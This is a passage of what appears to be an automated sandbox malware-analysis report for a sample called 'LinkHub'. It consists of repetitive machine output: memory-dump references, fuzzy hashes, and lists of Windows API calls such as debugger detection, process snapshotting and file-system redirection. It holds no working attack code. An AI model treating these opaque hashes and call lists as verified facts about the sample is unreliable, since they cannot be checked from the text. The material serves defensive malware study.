                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: a0a1e74ddcd20f8bf28b0ecc7879cf0eb3dd239312de3082a602ab1a9615d123
                                                                    • Instruction ID: 1429363bdf176e7bb347bffc748243578ea234f72a64ce4b563585d81c8c56f6
                                                                    • Opcode Fuzzy Hash: a0a1e74ddcd20f8bf28b0ecc7879cf0eb3dd239312de3082a602ab1a9615d123
                                                                    • Instruction Fuzzy Hash: E1F0F43482020DB6CF00BAA8DC9299F776C4A01754B604061B918960D2FBB0EAF5DA90
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002C8D52
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 002C8D59
                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 002C8F3A
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                    • String ID:
                                                                    • API String ID: 146820519-0
                                                                    • Opcode ID: 7e2c5749ce022ec88169460b24454cc8ed5edc093eaf4385fe44caf60daad9e8
                                                                    • Instruction ID: cd07b37ac52d9a2d6ff58bb694f29079a4fd442e9899b2907196f5084d5d2bd2
                                                                    • Opcode Fuzzy Hash: 7e2c5749ce022ec88169460b24454cc8ed5edc093eaf4385fe44caf60daad9e8
                                                                    • Instruction Fuzzy Hash: AF127A71A183419FD714DF28C484B6ABBE5FF88314F048A5DE8898B292CB71ED55CF92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$_strcat
                                                                    • String ID:
                                                                    • API String ID: 306214811-0
                                                                    • Opcode ID: c02e6b313340ba050a6b20c9e506297f4a53428dc38809d84a3e7acda0293f38
                                                                    • Instruction ID: 17562f0d1b7a93bbf976912894432f9b336f0b3f049137ae02b2bb6124af95f0
                                                                    • Opcode Fuzzy Hash: c02e6b313340ba050a6b20c9e506297f4a53428dc38809d84a3e7acda0293f38
                                                                    • Instruction Fuzzy Hash: A5A17031624505EFCB18DF18C5D5A69B7A5FF49314B2085AEE84A8F392DB31EDA1CF80
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002797BA,FF8BC369,00000000,00000002,00000000), ref: 00279744
                                                                    • GetLastError.KERNEL32(?,002797BA,FF8BC369,00000000,00000002,00000000,?,00275ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00266F41), ref: 0027974E
                                                                    • __dosmaperr.LIBCMT ref: 00279755
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 2336955059-0
                                                                    • Opcode ID: 137b39310df3b2950e3a4c21fc1189f724a27444f5ac547d5a42a2857e400451
                                                                    • Instruction ID: d7351b2b09672e7fa78be2572911c6fd5d07623934d4560a9bfe7fdbffb4c958
                                                                    • Opcode Fuzzy Hash: 137b39310df3b2950e3a4c21fc1189f724a27444f5ac547d5a42a2857e400451
                                                                    • Instruction Fuzzy Hash: 82014C32630615ABCF199F99EC05CAEBB2DDB85330F244249F8258B190EA70DDA1CB90
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00000030,00000000,?,00000002,00000000,?,002B0B03,00000000,?,00000000,?,00283A00,00000000), ref: 002B0D2E
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,002B0B03,00000000,?,00000000,?,00283A00,00000000), ref: 002B0D36
                                                                    • DuplicateHandle.KERNELBASE(00000000,?,002B0B03,00000000,?,00000000,?,00283A00,00000000), ref: 002B0D3D
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcess$DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 1294930198-0
                                                                    • Opcode ID: c4d715041ccf187cc3c284931561d96de35397502d83c220a87cfd9c8a3a13ad
                                                                    • Instruction ID: 0d8ad084da802e0fd2ab94136cc91731b3ef5d56e8ea2f889e54e094ddf2f610
                                                                    • Opcode Fuzzy Hash: c4d715041ccf187cc3c284931561d96de35397502d83c220a87cfd9c8a3a13ad
                                                                    • Instruction Fuzzy Hash: 9DD05E7B551706BBC7021BD9FC4DF7B7B7CEBC6B62F14405AF60986190DAB098109A21
                                                                    APIs
                                                                    • CloseHandle.KERNELBASE ref: 0026007D
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0026008F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3280610774-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: 3a77b1b2cb125507c145ffc58ff53825d7e9fd695ce0eba3c433601227c17ca1
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: C831D570A20106DFC718CF58D4C0A6AFBA5FB59300B2486A5E409CB652E772EDE1EBC0
                                                                    APIs
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00243A3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_
                                                                    • String ID:
                                                                    • API String ID: 1144537725-0
                                                                    • Opcode ID: ae3ac5220d589120f0973e66a0c6b55ba6e276c43ec899ef22a1c82c37a8598d
                                                                    • Instruction ID: 37c2c20d0c5a0494881ac4af2e944ace491e4cf4ceeb92a8f9c90830f5db06e2
                                                                    • Opcode Fuzzy Hash: ae3ac5220d589120f0973e66a0c6b55ba6e276c43ec899ef22a1c82c37a8598d
                                                                    • Instruction Fuzzy Hash: 293191B0615701CFD721EF24D884797BBE8FB49308F00092EE5DA87241E7B5AA68CB52
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00274F04
                                                                    • GetFileType.KERNELBASE(00000000), ref: 00274F16
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileHandleType
                                                                    • String ID:
                                                                    • API String ID: 3000768030-0
                                                                    • Opcode ID: 95478af09beed979f00c8cd11681a285db13bfd0761e3097b59cfd93fe6a1d94
                                                                    • Instruction ID: e0c89773ac3a34a543e84d2feb627540df171f3db7116eb5a3930c2515d6422a
                                                                    • Opcode Fuzzy Hash: 95478af09beed979f00c8cd11681a285db13bfd0761e3097b59cfd93fe6a1d94
                                                                    • Instruction Fuzzy Hash: D311B4315387528BC730AE3D9C886226A94A796330F39871AD5BAC79F1C770DCA19642
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,00283A00,00000000), ref: 002B0AEC
                                                                    • InterlockedExchange.KERNEL32(00000038,00000000), ref: 002B0B0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                    • String ID:
                                                                    • API String ID: 4104817828-0
                                                                    • Opcode ID: 469d669470f7548f39da94a75e1a3a931ca89408974706f95c2a624e8011a963
                                                                    • Instruction ID: 6fe071f57402cf8f8498a27971fd8e7370bd5a37f785a61ef9ea435e44dde2c7
                                                                    • Opcode Fuzzy Hash: 469d669470f7548f39da94a75e1a3a931ca89408974706f95c2a624e8011a963
                                                                    • Instruction Fuzzy Hash: 6DF017B15017059BC3209F56D9488A7FBECFF94720B40482EE58687A60C7B4B485CF90
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 0024333D
                                                                      • Part of subcall function 002432E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002432FB
                                                                      • Part of subcall function 002432E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00243312
                                                                      • Part of subcall function 0024338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00243368,?), ref: 002433BB
                                                                      • Part of subcall function 0024338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00243368,?), ref: 002433CE
                                                                      • Part of subcall function 0024338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00312418,00312400,?,?,?,?,?,?,00243368,?), ref: 0024343A
                                                                      • Part of subcall function 0024338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00312418,?,?,?,?,?,?,?,00243368,?), ref: 002434BB
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00243377
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                    • String ID:
                                                                    • API String ID: 1550534281-0
                                                                    • Opcode ID: 1d9f8049d515144f007d7190d37135f6d9943f31ac1766e8e7b434c8cf4843e0
                                                                    • Instruction ID: fb01deaa7dff64f3a7b880c9e655a29d9d673f92560a6cb6b75b64597e17eb44
                                                                    • Opcode Fuzzy Hash: 1d9f8049d515144f007d7190d37135f6d9943f31ac1766e8e7b434c8cf4843e0
                                                                    • Instruction Fuzzy Hash: 82F05E35964744AFE707AF70FC0BBA67BD8A708B19F008C56B518861E2CBBA85708F40
                                                                    APIs
                                                                      • Part of subcall function 002B1312: InterlockedExchange.KERNEL32(?,?), ref: 002B1322
                                                                      • Part of subcall function 002B1312: EnterCriticalSection.KERNEL32(00000000,?), ref: 002B1334
                                                                      • Part of subcall function 002B1312: TerminateThread.KERNEL32(00000000,000001F6), ref: 002B1342
                                                                      • Part of subcall function 002B1312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002B1350
                                                                      • Part of subcall function 002B1312: CloseHandle.KERNEL32(00000000), ref: 002B135F
                                                                      • Part of subcall function 002B1312: InterlockedExchange.KERNEL32(?,000001F6), ref: 002B136F
                                                                      • Part of subcall function 002B1312: LeaveCriticalSection.KERNEL32(00000000), ref: 002B1376
                                                                    • CloseHandle.KERNELBASE(?,?,002B0BBF), ref: 002B0B5D
                                                                    • DeleteCriticalSection.KERNEL32(?,?,002B0BBF), ref: 002B0B83
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2929296749-0
                                                                    • Opcode ID: 15bb032fdba6d5d6c0361b165483bfca934c87e078dc5f5e812654287c589d3f
                                                                    • Instruction ID: 6565b7575b4762ab87006d545c91df1d28881c2b52de956334dd7addd16fe4eb
                                                                    • Opcode Fuzzy Hash: 15bb032fdba6d5d6c0361b165483bfca934c87e078dc5f5e812654287c589d3f
                                                                    • Instruction Fuzzy Hash: 79E04F36421A02DBC7312F64FD89A96FBE4BF04311F2088AEF19A45831CB70A8E4DF04
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 0024CEEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID:
                                                                    • API String ID: 1385522511-0
                                                                    • Opcode ID: 059f0e80f229fa5462914bafcbc4efe9e9a6ee800d5f451490a4cc1c47c6e2e1
                                                                    • Instruction ID: 9f13c8a1e33f0a5ff231af715a278d186f8db2a70b3b310f56765111794b917d
                                                                    • Opcode Fuzzy Hash: 059f0e80f229fa5462914bafcbc4efe9e9a6ee800d5f451490a4cc1c47c6e2e1
                                                                    • Instruction Fuzzy Hash: 3E32F374A20206DFCF18CF59C884ABAB7B9FF49314F25806AE816AB251C774ED65CF50
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LoadString
                                                                    • String ID:
                                                                    • API String ID: 2948472770-0
                                                                    • Opcode ID: 9a4efc5be9a95ebbe60e0ce21b764fbfbf0115f6eab61cd77fd10f373c3804f2
                                                                    • Instruction ID: 3e9c1a4d63ddd39d36ff4ed813c880e0d33963086b108219f5c9b5e18098e271
                                                                    • Opcode Fuzzy Hash: 9a4efc5be9a95ebbe60e0ce21b764fbfbf0115f6eab61cd77fd10f373c3804f2
                                                                    • Instruction Fuzzy Hash: 56D14D75A2420ADFCB14EF98C481EEDBBB5FF48314F14415AE915AB291DB30AE61CF90
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 755ea9a3f00603960049f339f9e40c8f71be2afe6258aa83cb0bb0062ee0b587
                                                                    • Instruction ID: a227665cac7aa01954e7445833c412b78f3a4e016c2292932797e19c77564c17
                                                                    • Opcode Fuzzy Hash: 755ea9a3f00603960049f339f9e40c8f71be2afe6258aa83cb0bb0062ee0b587
                                                                    • Instruction Fuzzy Hash: 7C516935A20108AFDF10CF68D950BA97BA1EF85364F09C168EC189B391C771ED92CF90
                                                                    APIs
                                                                      • Part of subcall function 0024663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0024668B,?,?,002462FA,?,00000001,?,?,00000000), ref: 0024664A
                                                                      • Part of subcall function 0024663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0024665C
                                                                      • Part of subcall function 0024663E: FreeLibrary.KERNEL32(00000000,?,?,0024668B,?,?,002462FA,?,00000001,?,?,00000000), ref: 0024666E
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002462FA,?,00000001,?,?,00000000), ref: 002466AB
                                                                      • Part of subcall function 00246607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00285657,?,?,002462FA,?,00000001,?,?,00000000), ref: 00246610
                                                                      • Part of subcall function 00246607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00246622
                                                                      • Part of subcall function 00246607: FreeLibrary.KERNEL32(00000000,?,?,00285657,?,?,002462FA,?,00000001,?,?,00000000), ref: 00246635
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressFreeProc
                                                                    • String ID:
                                                                    • API String ID: 2632591731-0
                                                                    • Opcode ID: f2e0e8e476cde9293167b1b4bce4c2168d034679204853bb4b930d026df6f5bf
                                                                    • Instruction ID: f544d8531bec34f43b40bf52bf853978e91c8a792b2e01b07fb71e8b808233aa
                                                                    • Opcode Fuzzy Hash: f2e0e8e476cde9293167b1b4bce4c2168d034679204853bb4b930d026df6f5bf
                                                                    • Instruction Fuzzy Hash: B011E771660205AACF18BF60C80ABAD77A99F51710F11442EF442A61C2EEB5DA259F51
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __wsopen_s
                                                                    • String ID:
                                                                    • API String ID: 3347428461-0
                                                                    • Opcode ID: ab8dbd12c3e27a9346e7006b67964c80d5f48dd3db36f2b38571ec10f8b5fc0e
                                                                    • Instruction ID: 9dafc16700d7edb7d4a0473e58a193e367661c48ead4212d34c949bd061ba2e0
                                                                    • Opcode Fuzzy Hash: ab8dbd12c3e27a9346e7006b67964c80d5f48dd3db36f2b38571ec10f8b5fc0e
                                                                    • Instruction Fuzzy Hash: 39112A7691410AAFCF05DF58E945DDE7BF8EF48310F118069F809AB351DA31EA21CBA5
                                                                    APIs
                                                                      • Part of subcall function 00274FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0027319C,00000001,00000364,?,00260165,?,?,002B11D9,0000FFFF), ref: 00275031
                                                                    • _free.LIBCMT ref: 002753DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                    • Instruction ID: 143306d2c670365bcd36135b03e64e3dcbefdf9612c7377951f16b2daf26935b
                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                    • Instruction Fuzzy Hash: ED014972210345ABE335CF69D88195AFBEDEB85370F25461DF58883280EBB0A805CB74
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
